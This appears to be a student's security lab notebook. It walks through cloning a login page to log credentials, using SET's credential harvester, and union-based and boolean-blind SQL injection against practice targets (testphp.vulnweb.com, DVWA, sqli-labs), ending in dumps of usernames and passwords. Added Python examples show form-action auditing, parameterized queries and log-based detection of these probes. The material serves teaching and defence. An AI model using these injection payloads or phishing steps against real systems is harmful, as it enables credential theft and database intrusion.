Phishing and HTML Sum

Uploaded by

arsh20csu286
Copyright
© All Rights Reserved

Date: 09-01-23

Html addition page


Step 1: Write an HTML page (client-side programming) that takes in two integers, and a PHP page (server-side programming) that finds the sum of those integers.

Step 2: Paste the HTML and PHP files into the htdocs folder in XAMPP.
Step 3: Start the XAMPP Apache and SQL servers.

Step 4: Input the two integers and find the sum.


Date: 10-01-23

Phishing
Step 1: Take the source code from a site and change the form action to our PHP file.

Step 2: Create a PHP file to capture the username and password and store them in a log file.

Step 3: Start the XAMPP Apache and SQL servers.

Step 4: Store the HTML and PHP files in the htdocs folder.
Step 5: Go to 127.0.0.1/redeif.html in the browser and enter a username and password.

Step 6: The username and password are saved in the log file.
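
The change made in Step 1 is also what gives a cloned login page away: its password form no longer posts to the site it imitates. The check below is an added example, not part of the original lab record; the file name `capture.php`, the host `login.example.com` and both HTML snippets are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class FormAudit(HTMLParser):
    """Collect each <form>'s action and whether it holds a password input."""
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            if (a.get("type") or "").lower() == "password":
                self._cur["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def off_origin_password_forms(html, page_url, expected_hosts):
    """Return the resolved targets of password forms that post to a host
    other than the ones the real site is known to use."""
    audit = FormAudit()
    audit.feed(html)
    flagged = []
    for form in audit.forms:
        # A relative or empty action resolves against the page's own URL.
        target = urljoin(page_url, form["action"])
        host = (urlparse(target).hostname or "").lower()
        if form["password"] and host not in expected_hosts:
            flagged.append(target)
    return flagged

# Constructed samples: a genuine login form and a copy with the action changed.
GENUINE = ('<form action="/session" method="post"><input name="u">'
           '<input type="password" name="p"></form>')
CLONE = ('<form action="capture.php" method="post"><input name="u">'
         '<input type="password" name="p"></form>')
EXPECTED = {"login.example.com"}  # hypothetical legitimate host

if __name__ == "__main__":
    print(off_origin_password_forms(GENUINE, "https://login.example.com/", EXPECTED))
    print(off_origin_password_forms(CLONE, "http://127.0.0.1/redeif.html", EXPECTED))
```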
Date: 16-01-23

Phishing attack through Setoolkit

Step 1- enter setoolkit

Step 2- enter 1(social-engineering attacks)

Step 3- enter 2(website attack vector)


Step 4- enter 3(credential harvester attack method)

Step 5- enter 1(web templates)


Step 6- enter 2(google)

Step 7- enter credentials


EXPERIMENT NO. -4

Create databases.

23-01-2023

INSERT

Delete

Like
ORDER BY-

UNION
GROUP BY-

EXPERIMENT NO. -5
24-01-2023

Union based SQL injection on testphp


http://testphp.vulnweb.com/listproducts.php?cat=1

1. To Generate a SQL error, to break the query.

2. To count the number of columns, in the web application.


i) order by 50--+
ii) In order by 11--+ there is no error

3. To merge the data of all the columns, using UNION command to find vulnerable columns.

Select * from <table_name> union select 1,2,3,4,5,6,7,8,9,10,11


4. Fetching database name:
union select 1,database(),3,4,5,6,7,8,9,10,11

Here the database name is displayed which is acuart in this case.


5)

- Table names
UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 FROM information_schema.tables WHERE table_schema = 'acuart'
Here it shows the names of all the tables in the database.

- Find columns
UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_name = 'users'

It shows columns like name, email, pass, phone.


6. Finding values from columns
union select 1, uname,3,4,5,6,pass,8,email,10,11 from users
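
Every step above works because the `cat` value is pasted into the SQL text. The sketch below is an added example, not code from the lab or from the test site: it runs the same kind of input against a string-built query and a parameterized one. The in-memory SQLite schema and its values are constructed stand-ins, and the column count is 2 rather than 11.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in; table and column names are assumptions,
    # not the schema of the lab applications.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, cat INTEGER);
        CREATE TABLE users (uname TEXT, pass TEXT);
        INSERT INTO products VALUES (1, 'poster', 1), (2, 'print', 2);
        INSERT INTO users VALUES ('test', 'constructed-secret');
    """)
    return db

def list_products_concat(db, cat):
    # Vulnerable: the request parameter becomes part of the SQL text, so
    # "order by N" and "union select ..." are parsed as SQL.
    return db.execute(
        "SELECT id, name FROM products WHERE cat = " + cat).fetchall()

def list_products_bound(db, cat):
    # Hardened: the SQL text is fixed and the value is bound as data, so the
    # same input is only ever compared to the cat column as one value.
    return db.execute(
        "SELECT id, name FROM products WHERE cat = ?", (cat,)).fetchall()

def column_probe_errors(db, cat):
    # True when the string-built query surfaces a database error, which is
    # the signal the column-counting step depends on.
    try:
        list_products_concat(db, cat)
        return False
    except sqlite3.OperationalError:
        return True

UNION_INPUT = "1 union select uname, pass from users"  # pattern from the page

if __name__ == "__main__":
    db = make_db()
    print(list_products_concat(db, UNION_INPUT))   # users row is merged in
    print(list_products_bound(db, UNION_INPUT))    # no rows
    print(column_probe_errors(db, "1 order by 50"))
```

Binding removes the injection point; returning a generic error page instead of the database error additionally removes the feedback used in steps 1 and 2.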
Experiment No.-6
30-01-2023

LOW-LEVEL SECURITY
We enter a random user ID to get some result; here we are using 1 as the user ID.

To check for the SQL injection vulnerability, we put a “’” sign after ?id=1, giving ?id=1’, and then press Enter.

We see the SQL error, which confirms that this page has an SQL injection vulnerability.
Now we check the number of tables in this page's SQL database; for this we use “order by 5--+” after “?id=1’”.

We keep on decreasing the number to get a result; as we can see, on “order by 2” we get some result.
Find the vulnerable column using the command “union select 1,2--+”.
Here we can see the numbers 1 and 2 showing under First name and Surname respectively; from this we can conclude that columns 1 and 2 are vulnerable.

For finding database and version


data of all tables
Now we check the user column
Now we check the user and password using command “ union select user,password from
users”.

We get all users with their passwords.


HIGH SECURITY:

Step 1: Entered the query 1’; it shows an error, which means the database is vulnerable and can be exploited.

Step 2: Checking the number of columns; it doesn’t show any error for the

Query: 1’ order by 2#

But it shows an error on entering 1’ order by 3#, which means there are 2 columns that are vulnerable.
Step 3: Checking the columns.
Step 4: Checking the database and the tables of the database,

which shows there is one database, dvwa, and 2 tables by the names users and guestbook.
Step 5: Getting the confidential info from the table “users”:

Query: 1’ union select first_name, password from users#

which shows the first name and password as shown below.


Date: 31-01-23
Blind SQL injection DVWA

Low security
1. Entering 1 to show entries

2. Entering 1 doesn’t give output, so it might be blind injection

3. Entering a string to surely generate an error, but it doesn’t, so it might be blind SQL injection
4. Checking the number of columns

5. 1’ order by 3# doesn’t show an error, so it has 2 columns


6. Using select statement.

7. Getting version of database server


8. Getting database name
1' union select 1,database()#

10. Entering 1’ UNION SELECT 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'dvwa'# to get the table names doesn’t work

11. Inputting x' or 1='1 to get the names of users

12. Using substr to check if the version starts with 5

1' and 1=0 union select 6, substr(@@version,1,1)=5 #

13. 1' and 1=0 union select database(),table_name FROM information_schema.tables #

14. 1' and 1=0 union select column_name,table_name FROM information_schema.columns WHERE table_name = 'users'#

15. Getting user id and password

1' and 1=0 union select user_id,password FROM users#


13-02-2023
Implement Blind Based SQL injection in SQLi/Less-8/?id=1

localhost/sqli-labs-master/Less-8/?id=1

Let's try to break the query.

localhost/sqli-labs-master/Less-8/?id=1’
Try to find out the number of columns using an order by statement.

localhost/sqli-labs-master/Less-8/?id=1' order by 3--+

Let's see if it will support blind boolean-based SQL injection.

localhost/sqli-labs-master/Less-8/?id=1' and true--+

localhost/sqli-labs-master/Less-8/?id=1' and false--+

So, it is responding to boolean values, as it behaves differently when we ask it a true question and a false question. We can try boolean-based blind SQL injection here.

FOR CHECKING DATABASE

FALSE CONDITION

http://localhost/sqli/Less-8/?id=1%27%20and%20(length(database()))%20=%201%20--+
TRUE CONDITION

Length of database = 8 (SECURITY)

http://localhost/sqli/Less-8/?id=1%27%20and%20(length(database()))%20=%208%20--+

FOR SEARCHING SECURITY

1 and substr(database(),1,1)=’s’--+
1 and substr(database(),2,1)=’e’--+
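
The probes in these experiments are all visible in the web server's access log, because they travel in the query string. The scanner below is an added example, not part of the original lab record: it URL-decodes each request and counts, per client, the patterns used on this page. The log lines are constructed in Apache common log format with documentation-range IP addresses, and the rule names are hypothetical.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

RULES = {
    "column_count_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"information_schema\.(?:tables|columns)", re.I),
    "blind_boolean": re.compile(
        r"\b(?:substr|length)\s*\(+\s*(?:database\(\)|@@version)", re.I),
}

# Constructed sample log; the paths follow the lab URLs on this page.
SAMPLE_LOG = """\
192.0.2.10 - - [13/Feb/2023:10:00:01 +0000] "GET /sqli/Less-8/?id=1 HTTP/1.1" 200 512
192.0.2.10 - - [13/Feb/2023:10:00:05 +0000] "GET /sqli/Less-8/?id=1%27%20order%20by%203--+ HTTP/1.1" 200 512
192.0.2.10 - - [13/Feb/2023:10:00:09 +0000] "GET /sqli/Less-8/?id=1%27%20and%20(length(database()))%20=%201%20--+ HTTP/1.1" 200 480
192.0.2.10 - - [13/Feb/2023:10:00:12 +0000] "GET /sqli/Less-8/?id=1%27%20and%20(length(database()))%20=%208%20--+ HTTP/1.1" 200 512
192.0.2.10 - - [13/Feb/2023:10:00:15 +0000] "GET /sqli/Less-8/?id=1%27%20and%20substr(database(),1,1)=%27s%27--+ HTTP/1.1" 200 512
198.51.100.7 - - [13/Feb/2023:10:01:00 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 900
203.0.113.5 - - [13/Feb/2023:10:02:00 +0000] "GET /listproducts.php?cat=1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables HTTP/1.1" 200 950
"""

def scan(log_text):
    """Return {client_ip: Counter(rule_name -> hits)} for matching requests."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line
        client, target, _status = m.groups()
        # Decode %27, %20 and '+' so the rules see the text the database saw.
        query = unquote_plus(target.partition("?")[2])
        for name, rule in RULES.items():
            if rule.search(query):
                hits[client][name] += 1
    return dict(hits)

if __name__ == "__main__":
    for client, counts in scan(SAMPLE_LOG).items():
        print(client, dict(counts))
```

Repeated `blind_boolean` hits from one client are the characteristic trace of the length and substr guessing shown above, since each guess costs one request. Inputs sent in a POST body do not appear in the access log and need request-body logging to be seen.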
